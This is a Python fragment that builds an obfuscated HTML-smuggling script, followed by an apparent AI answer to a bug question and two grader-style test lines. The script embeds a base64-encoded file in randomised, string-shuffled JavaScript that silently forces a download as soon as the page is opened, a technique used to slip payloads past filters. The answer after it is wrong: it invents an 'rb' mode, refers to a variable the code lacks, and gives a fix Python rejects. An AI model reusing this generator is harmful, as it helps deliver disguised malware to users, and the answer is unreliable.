data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
The code is not saving to `script.txt` because the file is opened in `rb` (read binary) mode, which is not appropriate for writing text. To fix this, change the mode to `wb` (write binary):
1 | with open(file=outfile, encoding='utf-8', mode='wb') as wfile: |
Testing if the previous output contains the string file_name: False
Testing if the previous output contains the string with open(file=outfile: True